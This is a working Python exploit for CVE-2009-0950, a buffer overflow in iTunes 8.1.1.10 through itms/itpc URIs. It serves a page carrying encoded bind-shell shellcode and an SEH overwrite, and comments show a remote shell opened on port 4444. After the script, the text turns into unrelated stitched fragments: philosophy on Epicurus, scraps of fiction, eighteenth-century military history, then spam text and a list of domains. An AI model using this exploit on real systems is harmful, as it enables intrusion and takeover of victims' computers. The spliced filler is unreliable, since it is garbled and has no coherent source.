#!/usr/bin/python
# Apple iTunes 8.1.1.10 itms/itcp BOF Windows Exploit
# Matteo Memelli | ryujin __A-T__ offensive-security.com
# Spaghetti & Pwnsauce - 06/10/2009 www.offensive-security.com
# CVE-2009-0950 http://dvlabs.tippingpoint.com/advisory/TPTI-09-03
# Vulnerability can't be exploited simply overwriting a return address on the
# stack because of stack canary protection. Increasing buffer size leads to
# SEH overwrite but it seems that the Access Violation needed to get our own
# Exception Handler called is not always thrown.
# So, to increase reliability, the exploit sends two URI to iTunes:
# - the 1st payload corrupts the stack (it doesnt overwrite cookie, no crash)
# - the 2nd payload fully overwrite SEH to 0wN EIP
# Payloads must be encoded in order to obtain pure ASCII printable shellcode.
# I could trigger the vulnerability from Firefox but not from IE that seems
# to truncate the long URI.
# Tested on Windows XP SP2/SP3 English, Firefox 3.0.10,
# iTunes 8.1.1.10, 8.1.0.52
#
# --> hola hola ziplock, my Apple Guru! ;) && cheers to muts... he knows why
#
# ryujin:Desktop ryujin$ ./ipwn.py
# [+] iTunes 8.1.10 URI Bof Exploit Windows Version CVE-2009-0950
# [+] Matteo Memelli aka ryujin __A-T__ offensive-security.com
# [+] www.offensive-security.com
# [+] Spaghetti & Pwnsauce
# [+] Listening on port 80
# [+] Connection accepted from: 172.16.30.7
# [+] Payload sent, wait 20 secs for iTunes error!
# ryujin:Desktop ryujin$ nc -v 172.16.30.7 4444
# Connection to 172.16.30.7 4444 port [tcp/krb524] succeeded!
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Mozilla Firefox>
from socket import *
html = """
iTunes loading . . .
iTunes 8.1.1.10 URI Bof Exploit Windows Version CVE-2009-0950
ryujin __ A-T __ offensive-security.com
www.offensive-security.com
iTunes starting... wait for 20 secs; if you get an error, click "Ok"
in the MessageBox before checking for your shell on port 4444 :)
If victim host is not connected to the internet, exploit will fail
unless iTunes is already opened and you disable "openiTunes" javascript
function.
This exploit works if opened from Firefox not from IE!
After exploitation iTunes crashes, you need to kill it from TaskManager
have fun!
"""
# Alpha2 ASCII printable Shellcode 730 Bytes, via EDX (0x60,0x40 Badchar)
# This is not standard Alpha2 bind shell. Beginning of shellcode is modified
# in order to obtain register alignment and to reset ESP and EBP we mangled
# before. Rest of decoded shellcode is Metasploit bind shell on port 4444
# EXITFUNC=thread
#
shellcode = ("VVVVVVVVVVVVVVVVV7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIOqhDahIoS0"
"5QnaJLS1uQVaeQcdcm2ePESuW5susuPEsuilazJKRmixHykOkOKOCPLKPlUtu"
"tnkRegLLKSLfepx31zOlK2o7hlKqOEpWqZK3ylKwDLKeQHndqo0j9llOt9P3D"
"uW9Q8J4MWqkrJKkDukPTWTq845M5LKQOq4VajKcVLKTLPKlKQOUL6ajK336LL"
"KMY0lWTwle1O3TqiK2DLKaSFPLKQPVllK0p7lLmlK3pUXQNU8LNbnvnjL0PkO"
"8V2Fv3U61xds02U8RWpsVRqO649on0PhjkZMYlekpPKOKfsoMYkUpfna8mgxV"
"b65RJuRIoHPPhHYFiL5lmBwkOzvpSPSV3F3bsg3BsSsScIohPsVRHR1sl2Fcc"
"k9M1nuphOT6zppIWrwKO8VcZ6ppQv5KO8PBHmtNMvNm9QGKON6aCqEkOZpbHZ"
"EbiNfRiSgioiFRpf40TseiohPLSu8KWD9kvPyf7YoxVqEKOxPu6sZpd3VSX1s"
"0mK98ecZRpv9Q9ZlMYkWqzpDmYxbTqO0KCoZKNaRVMkN3r6LJ3NmpzFXNKNKL"
"ksX0rkNls5FkOrURdioXVSk67PRPQsapQCZgqbq0QSesaKOxPaxNMZyEUjnCc"
"KOn6qzKOkOtwKOJpNk67YlMSKtcTyozvrryozp0hXoZnYp1p0SkOXVKOHPA")
# Padding
pad0x1 = "\x41"*425
# Make EDX pointing to shellcode and "pray" sh3llcod3 M@cumBa w00t w00t
align = "\x61"*45 + "\x54\x5A" + "\x42"*6 + "V"*10
# Padding
pad0x2 = "\x41"*570
# ASCII friendly RET overwriting SEH: bye bye canary, tweet tweet
# 0x67215e2a QuickTime.qts ADD ESP,8;RETN (SafeSEH bypass)
ret = "\x2a\x5e\x21\x67"
# Let the dance begin... Point EBP to encoded jmp
align_for_jmp = "\x61\x45\x45\x45" + ret + "\x44" + "\x45"*7
# Decode a NEAR JMP and JUMP BACK BABY!
jmp_back = ("UYCCCCCCIIIIIIIIII7QZjAXP0A0AkA"
"AQ2AB2BB0BBABXP8ABuJIZIE5jZKOKOA")
# Padding
pad0x3 = "\x43"*162
# We send 2 payloads to iTunes: first is itms and second itpc
# url1 smashes the stack in order to get an AV later
url1 = "itms://:" + "\x41"*200 + "/"
url2 = "itpc://:" + pad0x1 + align + shellcode +pad0x2 +\
align_for_jmp + jmp_back + pad0x3
payload = html % (url1, url2)
print "[+] iTunes 8.1.1.10 URI Bof Exploit Windows Version CVE-2009-0950"
print "[+] Matteo Memelli aka ryujin __A-T__ offensive-security.com"
print "[+] www.offensive-security.com"
print "[+] Spaghetti & Pwnsauce"
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 80))
s.listen(1)
print "[+] Listening on port 80"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.recv(1024)
c.send(payload)
print "[+] Payload sent, wait 20 secs for iTunes error!"
c.close()
s.close()
But the Countess thrust her fiercely aside. 3. The force of the water is greatest by its striking against planes at right angles to its course. Returning to Epicurus, we have next to consider how he obtained the various motions required to bring his atoms into those infinite combinations of which our world is only the most recent. The conception of matter naturally endowed with capacities for moving in all directions indifferently was unknown to ancient physics, as was also that of mutual attraction and85 repulsion. Democritus supposed that the atoms all gravitated downward through infinite space, but with different velocities, so that the lighter were perpetually overtaken and driven upwards by the heavier, the result of these collisions and pressures being a vortex whence the world as we see it has proceeded.163 While the atomism of Democritus was, as a theory of matter, the greatest contribution ever made to physical science by pure speculation, as a theory of motion it was open to at least three insuperable objections. Passing over the difficulty of a perpetual movement through space in one direction only, there remained the self-contradictory assumption that an infinite number of atoms all moving together in that one direction could find any unoccupied space to fall into.164 Secondly, astronomical discoveries, establishing as they did the sphericity of the earth, had for ever disproved the crude theory that unsupported bodies fall downward in parallel straight lines. Even granting that the astronomers, in the absence of complete empirical verification, could not prove their whole contention, they could at any rate prove enough of it to destroy the notion of parallel descent; for the varying elevation of the pole-star demonstrated the curvature of the earth’s surface so far as it was accessible to observation, thus showing that, within the limits of experience, gravitation acted along convergent lines. Finally, Aristotle had pointed out that the observed differences in the velocity of falling bodies were due to the atmospheric resistance, and that, consequently, they would all move at the same rate in such an absolute vacuum as atomism assumed.165 Of these objections Epicurus ignored the first two, except, apparently, to the extent of refusing to believe in the antipodes. The third he acknowledged, and set himself to evade it by a hypothesis striking at the root of all scientific86 reasoning. The atoms, he tells us, suffer a slight deflection from the line of perpendicular descent, sufficient to bring them into collision with one another; and from this collision proceeds the variety of movement necessary to throw them into all sorts of accidental combinations. Our own free will, says Lucretius, furnishes an example of such a deflection whenever we swerve aside from the direction in which an original impulse is carrying us.166 That the irregularity thus introduced into Nature interfered with the law of universal causation was an additional recommendation of it in the eyes of Epicurus, who, as we have already mentioned, hated the physical necessity of the philosophers even more than he hated the watchful interfering providence of the theologians. But, apparently, neither he nor his disciples saw that in discarding the invariable sequence of phenomena, they annulled, to the same extent, the possibility of human foresight and adaptation of means to ends. There was no reason why the deflection, having once occurred, should not be repeated infinitely often, each time producing effects of incalculable extent. And a further inconsequence of the system is that it afterwards accounts for human choice by a mechanism which has nothing to do with free-will.167 that that is hopeless. When you wouldn't come to my commencement, The two chairs are now placed side by side, and the priest goes on chanting his prayers to a slow measure, in a nasal voice that is soon lost again in the chatter of the bystanders. Rice is once more shed over the couple, and incense is burnt in a large bronze vessel, the perfume mingling with that of the jasmine wreaths on the walls. The view spread to the horizon of mauve-pink sky, very faintly streaked with green. We could see the white mass of Secunderabad, a town of English barracks, at the foot of chaotic red-brown rocks, looking like the heaped-up ruins of some city of the Titans; and among trees shrouded in blue smoke, Hyderabad, conspicuous for its two mosques—the tomb of the Empress and the Jumna Musjid, the mausoleum of the Nizams. There was an expression in his eyes Cairness did not understand. It was not like their usual twinkle of welcome. "Wait a moment," he said, and went on with his writing. Cairness dropped down on the ground, and, for want of anything else to do, began to whittle a whistle out of a willow branch. "It brought back too much that was unpleasant for me. I did not want to talk about it. He saw that I did not, too, and I can't understand why he should have spoken of it. I should have told you after he had gone." She was not disconcerted in the slightest, only a little vindictive toward Forbes, and he thought it would hardly be worth his while to point out the curious position her silence put him in. In Germany, Frederick of Prussia was hard put to it. A fresh army of Russians, under General Soltikow, advanced to the Oder, and another army of Austrians, under Laudohn, advanced to form a junction with them. To prevent this, Frederick sent General Wedel to encounter the Russians, but he was defeated by them on the 23rd of July, with heavy loss. Frederick himself then hastened against them, but, before his arrival, the Austrians had joined Soltikow, making a united force of sixty thousand, which Frederick attacked, on the 12th of August, with forty-eight thousand, at the village of Kunersdorf, close to Frankfort-on-the-Oder. At first he was successful; but, attempting to push his advantages, he was completely beaten, the whole of his army being killed or scattered to three thousand men. So completely did his ruin now seem accomplished, that, expecting the Russians, Austrians, Poles, Swedes, and Saxons to come down on him on all sides, he once more contemplated taking the poison that he still carried about him; wrote a letter to that effect to his Prime Minister, and directed the oath of allegiance to be taken to his nephew, and that his brother, Prince Henry, should be regent; but finding that the Russians, who had lost twenty thousand men, were actually drawing off, he again took courage, was soon at the head of thirty thousand men, and with these was hastening to the relief of Dresden, when he was paralysed by the news that General Finck, with twelve thousand men, had suffered himself to be surrounded at Maxen, and compelled to surrender. Despairing of relieving Dresden during this campaign, Frederick eventually took up his winter quarters at Freiberg, in Saxony, and employed himself in raising and drilling fresh soldiers; compelled, however, to pay his way by debasing both the Prussian coin, and the English gold which he received in subsidy, by a very large alloy. "You don't seem to have a clear idea of numbers. How many regiments have you got over there?" "Surely we are all responsible men—" Rogier began. It is my death and my song. They had piled the faggots against the door of the barn. The workmen inside were tumbling about in the dark, half ignorant of what was going on. "Yes—that makes up to us a bit, but it d?an't do us any real good ... only helps us git round a man sometimes when we can't git over him." HoME免费观看一级范冰冰
ENTER NUMBET 0018www.magnesita.com.cn www.kidtime.com.cn baiaogoo.org.cn newspiral.com.cn www.shuijingzuan.com.cn www.drnx078.com.cn www.fkpx938.com.cn lctpk.com.cn www.ertrtdf.net.cn sh-ysjs.com.cn